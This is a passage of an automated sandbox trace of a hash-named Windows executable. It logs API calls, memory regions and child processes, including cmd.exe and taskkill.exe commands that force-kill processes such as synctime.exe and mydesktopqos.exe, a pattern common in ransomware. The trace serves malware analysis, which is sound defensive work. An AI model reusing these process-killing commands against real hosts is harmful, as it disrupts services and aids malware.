fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x44b110 [0159.818] GetProcessHeap () returned 0x440000 [0159.818] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4477a8, Size=0x4) returned 0x44b150 [0159.818] FindClose (in: hFindFile=0x44b110 | out: hFindFile=0x44b110) returned 1 [0159.818] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0159.818] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0159.818] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0159.823] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0159.823] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0159.823] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154)) [0159.823] GetProcessHeap () returned 0x440000 [0159.823] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x18) returned 0x4476e8 [0159.823] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0159.823] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0159.823] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0159.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0159.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0159.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0159.823] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0159.823] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.824] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0159.825] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0159.825] GetProcessHeap () returned 0x440000 [0159.825] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x4476e8) returned 1 [0159.825] GetProcessHeap () returned 0x440000 [0159.825] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa) returned 0x44b110 [0159.825] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0159.829] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im synctime.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im synctime.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im synctime.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x8e8, dwThreadId=0x1010)) returned 1 [0159.852] CloseHandle (hObject=0x98) returned 1 [0159.852] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0159.852] GetProcessHeap () returned 0x440000 [0159.853] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x449d50) returned 1 [0159.853] GetEnvironmentStringsW () returned 0x449d50* [0159.853] GetProcessHeap () returned 0x440000 [0159.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa76) returned 0x447cc0 [0159.853] FreeEnvironmentStringsA (penv="=") returned 1 [0159.853] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0161.638] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0161.639] CloseHandle (hObject=0x9c) returned 1 [0161.639] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0161.639] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0161.642] GetProcessHeap () returned 0x440000 [0161.643] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x447cc0) returned 1 [0161.643] GetEnvironmentStringsW () returned 0x44b160* [0161.643] GetProcessHeap () returned 0x440000 [0161.643] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa9c) returned 0x447cc0 [0161.643] FreeEnvironmentStringsA (penv="=") returned 1 [0161.643] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0161.643] GetProcessHeap () returned 0x440000 [0161.643] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x447cc0) returned 1 [0161.643] GetEnvironmentStringsW () returned 0x44b160* [0161.644] GetProcessHeap () returned 0x440000 [0161.644] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa9c) returned 0x447cc0 [0161.644] FreeEnvironmentStringsA (penv="=") returned 1 [0161.644] GetProcessHeap () returned 0x440000 [0161.644] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44b110) returned 1 [0161.644] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0161.644] _get_osfhandle (_FileHandle=1) returned 0x144 [0161.644] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0161.644] _get_osfhandle (_FileHandle=1) returned 0x144 [0161.644] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0161.644] _get_osfhandle (_FileHandle=0) returned 0x140 [0161.644] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0161.644] GetConsoleOutputCP () returned 0x1b5 [0161.647] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0161.647] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.701] exit (_Code=128) Thread: id = 176 os_tid = 0xfb8 Process: id = "25" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x32563000" os_pid = "0x8e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x1018" cmd_line = "taskkill /f /im synctime.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2168 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2169 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2170 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2171 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 2172 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2173 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 2174 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 2175 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2176 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2177 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2178 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2179 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2180 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2181 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2182 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2183 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2184 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2185 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2186 start_va = 0x4540000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 2187 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2188 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2189 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2190 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2191 start_va = 0x4550000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 2192 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2193 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2194 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2195 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2196 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2197 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2198 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2199 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2200 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2201 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 2202 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2203 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2204 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2205 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2206 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2207 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2208 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2209 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2210 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2211 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2212 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2213 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2214 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2215 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2216 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2217 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2218 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2219 start_va = 0x4550000 end_va = 0x46affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 2220 start_va = 0x46e0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 2221 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2222 start_va = 0x47e0000 end_va = 0x4967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047e0000" filename = "" Region: id = 2223 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2224 start_va = 0x4970000 end_va = 0x4af0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004970000" filename = "" Region: id = 2225 start_va = 0x4b00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 2226 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2227 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 2228 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 2229 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 2230 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 2231 start_va = 0x5f00000 end_va = 0x6236fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2232 start_va = 0x4550000 end_va = 0x4639fff monitored = 0 entry_point = 0x458d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2233 start_va = 0x46a0000 end_va = 0x46affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2234 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 2235 start_va = 0x4550000 end_va = 0x462ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2236 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2237 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 2238 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2239 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 2240 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2241 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2242 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2243 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2244 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 2245 start_va = 0x4630000 end_va = 0x466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 2246 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 2247 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 2248 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 2249 start_va = 0x6300000 end_va = 0x633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 2250 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2251 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2252 start_va = 0x4520000 end_va = 0x4525fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004520000" filename = "" Thread: id = 177 os_tid = 0x1010 Thread: id = 178 os_tid = 0x13d0 Thread: id = 179 os_tid = 0x5f4 Thread: id = 180 os_tid = 0x1104 Thread: id = 181 os_tid = 0xbd8 Process: id = "26" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x32148000" os_pid = "0x54c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im mydesktopqos.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 